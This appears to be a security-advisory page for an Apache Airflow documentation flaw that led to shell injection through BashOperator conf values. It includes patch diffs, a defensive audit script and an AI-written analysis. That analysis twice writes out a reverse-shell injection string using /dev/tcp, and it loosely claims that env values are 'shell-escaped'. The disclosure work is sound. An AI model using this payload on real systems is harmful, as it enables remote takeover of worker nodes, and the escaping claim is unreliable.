VYPR
Unrated severity · NVD Advisory · Published Jun 1, 2026

CVE-2026-42252

Description

Apache Airflow docs showed an unquoted BashOperator Jinja example leading to shell injection via trigger API conf values.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The official Apache Airflow documentation page at core-concepts/dag-run.html provided an example of passing parameters when triggering DAGs that used the pattern BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") without any quoting or sanitization warning (source: [1]). Dag authors who copied this exact verbatim pattern into deployments where users had Dag.can_trigger permission (common in multi-team setups and hosted offerings exposing a trigger API) could inadvertently open a shell-injection vulnerability. The code path allows a trigger user to supply malicious shell metacharacters in the conf field. Affected deployments include any Airflow version prior to the documentation correction in apache/airflow 3.2.2. The fix is captured in PR 64129 [1].

Exploitation

An authenticated attacker with the Dag.can_trigger permission on the affected DAG can craft a trigger request where the conf parameter contains shell metacharacters such as "; bash -i >& /dev/tcp/.../9999 0>&1; #". When the DAG runs the unquoted BashOperator command, the injected string is interpreted by the shell, leading to arbitrary command execution. No further user interaction or privileges are required beyond the trigger API access [1]. The pattern is a classic injection via unsanitized Jinja templating in a shell command.

Impact

Successful exploitation allows the attacker to execute arbitrary operating system commands as the Airflow worker user. This typically results in full compromise of the worker node, including data exfiltration, lateral movement, and potential persistence within the infrastructure. The confidentiality, integrity, and availability of the Airflow environment and its connected resources are at risk [1]. This vulnerability is part of a pattern similar to prior CVEs CVE-2025-50213 and CVE-2025-27018.

Mitigation

The documentation has been corrected in PR 64129 [1] and is included in the apache-airflow 3.2.2 release or later. Users should upgrade to version 3.2.2 or later to receive the corrected documentation. For existing deployments, users must audit DAG code for the unquoted pattern and apply shell quoting (e.g., `shlex.quote`, or `quote` from the older `pipes` module) or avoid passing untrusted conf values into BashOperator commands. No workaround is available if the pattern is already in use; the recommended fix is to update both the documentation and the DAG code.

AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

af4f825962c0

update Dag Runs document under Core Concept to make it consistent with BashOperator document (#64129)

https://github.com/apache/airflow · Kevin Yang · Mar 24, 2026 · via nvd-ref
1 file changed · +2 −1
  • airflow-core/docs/core-concepts/dag-run.rst · +2 −1 · modified
    @@ -271,7 +271,8 @@ Example of a parameterized Dag:
     
         parameterized_task = BashOperator(
             task_id="parameterized_task",
    -        bash_command="echo value: {{ dag_run.conf['conf1'] }}",
    +        bash_command="echo \"here is the message: '$message'\"",
    +        env={"message": '{{ dag_run.conf["message"] if dag_run else "" }}'},
             dag=dag,
         )
     
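Review bot: the conf key changes from `conf1` to `message`, but the hunk shows no matching update to the surrounding text or trigger example on this page, so check that any reference to `conf1` elsewhere in dag-run.rst is updated in the same change. The `if dag_run else ""` guard keeps the example rendering when no DagRun is present, and a one-line note beside the example explaining why the value goes through `env` (bash expands `$message` as data instead of re-parsing it as command text) would help readers who copy it.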
    
cde4885818be

Updating release notes for 3.2.2rc3

https://github.com/apache/airflow · vatsrahul1001 · May 26, 2026 · Fixed in 3.2.2 · via release-tag
2 files changed · +5 −4
  • RELEASE_NOTES.rst · +3 −2 · modified
    @@ -24,7 +24,7 @@
     
     .. towncrier release notes start
     
    -Airflow 3.2.2 (2026-05-27)
    +Airflow 3.2.2 (2026-05-29)
     --------------------------
     
     Significant Changes
    @@ -81,7 +81,8 @@ Significant Changes
     
     Bug Fixes
     ^^^^^^^^^
    -
    +- Fix ``Callback.handle_event`` triggerer crash when OpenTelemetry metrics receive dict typed tag values (#67527) (#67529)
    +- UI: Rewrite ``modulepreload hrefs`` to the api-server static path (#67548) (#67556)
     - Correctly pre-allocate ``external_executor_id`` with multiple executors on PostgreSQL (#67388) (#67458)
     - Return raw import-error stacktrace when a Dag file has no registered Dag (#67465) (#67478)
     - UI: Fix Expand/Collapse All on XComs and Audit Log JSON cells (#67316) (#67361)
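Review bot: the Bug Fixes list gains two entries, neither of which mentions the dag-run documentation correction from #64129 that this advisory ties to 3.2.2; if that commit ships in this release, a line referencing it here would make the fix discoverable from the release notes.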
    
  • reproducible_build.yaml · +2 −2 · modified
    @@ -1,2 +1,2 @@
    -release-notes-hash: 6407b48d1054fe3ce68c09bf4435d91d
    -source-date-epoch: 1779745327
    +release-notes-hash: 504288db9a9dc13a0db859232fab98d0
    +source-date-epoch: 1779811737
    

Vulnerability mechanics

Root cause

"The documentation example placed an unsanitized Jinja template expression (`dag_run.conf['conf1']`) directly into the `bash_command` string of `BashOperator`, allowing shell metacharacters from user-supplied `conf` values to reach `os.exec`."

Attack vector

An attacker who holds the `Dag.can_trigger` permission on a deployment whose Dag code was copied from the pre-correction documentation example can inject shell metacharacters via the `conf` field of the trigger API. Supplying a value such as `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` causes the unsanitized string to be interpolated into the `bash_command` argument, leading to arbitrary command execution on the worker node via `os.exec`. This is a template-injection-to-shell-injection chain [CWE-1336].

Affected code

The documentation file `airflow-core/docs/core-concepts/dag-run.rst` contained a verbatim `BashOperator` example that interpolated `dag_run.conf['conf1']` directly into a `bash_command` string without shell quoting or sanitization. The patch replaces that unsafe pattern with one that passes the user-supplied value through the `env` parameter, which is automatically shell-escaped by Airflow's execution environment.

What the fix does

The patch (commit af4f825962c0, PR #64129) replaces the unsafe `bash_command="echo value: {{ dag_run.conf['conf1'] }}"` pattern with `bash_command="echo \"here is the message: '$message'\""` combined with `env={"message": '{{ dag_run.conf["message"] if dag_run else "" }}'}`. By moving the user-controlled value into the `env` dictionary, Airflow's executor automatically applies proper shell escaping, preventing metacharacter injection. The commit message confirms the change makes the example consistent with the existing `BashOperator` documentation, which already uses the `env` pattern.
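Added example, not code from the Airflow project or from this advisory, serving the Mitigation section's audit advice and the fix description above: it flags `bash_command` literals that interpolate `dag_run.conf`, then shows how a constructed conf value tokenizes under the old pattern, under `shlex.quote`, and under the `env` pattern from #64129, where the command text is constant and bash expands `$message` as data. The DAG source and the conf value are constructed; `find_conf_in_bash_command`, the `render_*` helpers and `shell_words` are names chosen here.

```python
import re
import shlex

# Constructed DAG source (not from the Airflow repository): the first task copies
# the pre-correction docs pattern, the second uses the env pattern from #64129.
SAMPLE_DAG = '''bad = BashOperator(
    task_id="parameterized_task",
    bash_command="echo value: {{ dag_run.conf['conf1'] }}",
)
good = BashOperator(
    task_id="env_task",
    bash_command="echo \\"here is the message: '$message'\\"",
    env={"message": '{{ dag_run.conf["message"] if dag_run else "" }}'},
)
'''

# A bash_command= string literal (backslash escapes inside it are skipped) ...
BASH_COMMAND_RE = re.compile(
    r'bash_command\s*=\s*(?P<q>["\'])(?P<body>(?:\\.|(?!(?P=q)).)*)(?P=q)', re.S)
# ... whose body contains a Jinja expression reading dag_run.conf.
CONF_RE = re.compile(r'\{\{[^}]*\bdag_run\.conf\b[^}]*\}\}')

def find_conf_in_bash_command(source: str):
    """Audit helper: (line, bash_command body) for each literal that interpolates
    dag_run.conf directly. Values routed through env= are not in the body."""
    hits = []
    for m in BASH_COMMAND_RE.finditer(source):
        body = m.group("body")
        if CONF_RE.search(body):
            hits.append((source.count("\n", 0, m.start()) + 1, body))
    return hits

def render_unquoted(conf_value: str) -> str:
    """What the old example handed to bash: the conf value pasted verbatim."""
    return "echo value: " + conf_value

def render_shlex_quoted(conf_value: str) -> str:
    """The shlex.quote mitigation from the advisory: the value is one literal word."""
    return "echo value: " + shlex.quote(conf_value)

def render_env_pattern(conf_value: str):
    """The #64129 pattern: constant command text; bash expands $message as data."""
    return 'echo "here is the message: \'$message\'"', {"message": conf_value}

def shell_words(command: str):
    """Tokenize like a POSIX shell so ';', '|' and '&' appear as operators."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)
```

Running `find_conf_in_bash_command` over real DAG files flags only the direct interpolation; each hit still needs a human look, since a filtered expression is also reported.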

Preconditions

  • config: The target Dag's code must have been copied from the pre-correction documentation example, using unsanitized `{{ dag_run.conf['...'] }}` directly in `bash_command`.
  • auth: The attacker must possess the `Dag.can_trigger` permission on the affected Dag.
  • network: The attacker must be able to reach the trigger API (e.g., Airflow REST API or UI trigger endpoint).
  • input: The attacker supplies a `conf` JSON payload containing shell metacharacters.

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
